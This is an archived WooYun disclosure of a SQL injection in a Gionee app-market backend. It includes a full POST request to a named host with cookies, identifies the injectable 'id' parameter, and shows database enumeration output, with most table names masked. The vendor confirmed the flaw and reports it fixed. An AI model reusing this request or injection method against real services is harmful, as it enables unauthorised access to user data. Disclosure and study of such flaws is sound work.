乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-25: 细节已通知厂商并且等待厂商处理中 2016-02-29: 厂商已经确认,细节仅向厂商公开 2016-03-03: 厂商已经修复漏洞并主动公开,细节向公众公开
金立手机某处MySQL注入(影响150W用户信息)
POST /dvp_app_shoufa_edit.php?userid=&token= HTTP/1.1Host: ht.myaora.net:82Content-Length: 464Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://ht.myaora.net:82Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5971&package=com.bccv.meitu&act=businessAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_026fc5a6a4f9402e52f6011dd6a28899=1456117728; PHPSESSID=prbh2flgmhv9e73ged9qa6goo1hidtype=2&id=5971&softid=0&package=com.bccv.meitu&dvp_id=27596&name=%E5%A3%AB%E5%A4%A7%E5%A4%AB%E9%9A%8F%E9%A3%8E%E5%80%92+&app_id=0&start_time=&sel_state=4&act=business&Submit=%E6%8F%90%E4%BA%A4%E7%BB%93%E6%9E%9C&refuse=%E8%AF%B7%E4%B8%8A%E4%BC%A0%E5%85%AC%E5%8F%B8%E5%90%8D%E8%AF%81%E7%85%A7%EF%BC%8C%E8%AF%B7%E4%BF%AE%E6%94%B9%E5%85%AC%E5%8F%B8%E5%90%8D%E7%A7%B0%EF%BC%8C%E8%AF%B7%E8%AF%A6%E7%BB%86%E5%86%99%E6%B8%85%E5%BA%94%E7%94%A8%E8%AF%B4%E6%98%8E%E3%80%82
id存在注入
available databases [13]:[*] #mysql50#lost+found[*] abc[*] aorausermanagerdb[*] att[*] att_2[*] comment[*] dw_market_king[*] information_schema[*] market_king[*] mysql[*] pad_market[*] performance_schema[*] test
*****arket_**********tab**********---------**********pp_VS ********** **********T **********FTTHUMB ********** ********** ********** ********** **********re_list ********** ********** ********** ********** ********** **********fo **********fo_2016 **********fo_2016_0********** ********** ********** ********** ********** ********** ********** **********ft ********** ********** ********** **********mmend ********** ********** ********** ********** ********** ********** ********** **********k **********alog ********** ********** ********** ********** ********** **********serinfo_2**********special **********ore_histo**********og ********** **********opy **********core **********score ********** **********rd2016 **********rd2016020********** **********e_history********** **********e ********** **********_0201 **********_0202 **********_0203 **********_0204 **********_0205 **********_0206 **********_0207 **********_0208 **********_0209 **********_0210 **********_0211 **********_0212 **********_0213 **********_0214 **********_0215 **********k ********** ********** **********_history **********oad ********** ********** **********00 **********00 **********ore_histo********** ********** ********** ********** ********** ********** ********** **********talog **********atus ********** ********** **********y **********y_dates **********siness ********** **********_ver ********** **********l ********** **********g **********e ********** ********** ********** ********** **********hot ********** **********disabledd**********noapk **********ize ********** **********tt ********** **********_20160201********** **********aw ********** **********sk ********** ********** ********** ********** **********g ********** ********** ********** ********** ********** ********** ********** ********** **********le **********ule ********** ********** ********** ********** **********_data ********** ********** ********** **********d ********** ********** ********** **********nt ********** ********** ********** ********** ********** **********screensho**********ore **********eyword ********** ********** ********** **********al **********ge_consol**********ge_online**********ge_specia**********d_input ********** **********ta **********story **********age **********re ********** **********unt **********load_list**********r **********_setting **********in ********** **********ore **********e **********on **********on_conten********** ********** **********ner **********k **********e **********t **********t_v4 **********atics **********_adapter ********** **********k_input **********ut ********** ********** ********** ********** ********** ********** ********** ********** **********crement ********** ********** ********** **********n_soft **********idate ********** **********d ********** ********** ********** ********** **********db ********** ********** **********r ********** ********** **********_copy ********** ********** ********** ********** **********as ********** ********** **********ddres ********** **********_account **********illegal **********list **********list_upda**********d ********** ********** **********ord **********ing ********** ********** ********** **********r ********** ********** **********k ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** ********** **********tegory ********** ********** ********** ********** **********s ********** ********** **********s ********** ********** ********** **********screensho**********ad_rank ********** ********** **********_content ********** **********_task ********** ********** **********_ad ********** **********ent **********s **********ts ********** ********** **********_ad ********** ********** **********ontent **********ot_data **********henhe **********emp **********opic **********ulan ********** ********** ********** ********** **********l ********** ********** **********ire **********ire_answe**********ire_detai**********ire_exams**********ire_histo********** **********e ********** ********** **********n ********** **********tent ********** **********ter_keywo********** ********** **********_score **********tall **********el ********** ********** ********** ********** ********** ********** ********** ********** **********te ********** **********0 **********ck **********idu_new **********itun **********ndoujia **********ndoujia_a**********ngyongbao**********ngyongbao**********uxidating**********imeiyingy********** ********** ********** ********** **********g ********** ********** ********** ********** **********list **********pe ********** **********ee_score **********ore ********** ********** **********e ********** ********** ********** ********** ********** ********** **********_catalog **********word **********k **********cial **********t **********ght **********ord ********** ********** ********** ********** ********** ********** ********** ********** **********ecord **********unt **********---------*****
危害等级:高
漏洞Rank:10
确认时间:2016-02-29 15:09
谢谢,已经告知相关公司同事 。谢谢
2016-03-03:相关同事已经修复。谢谢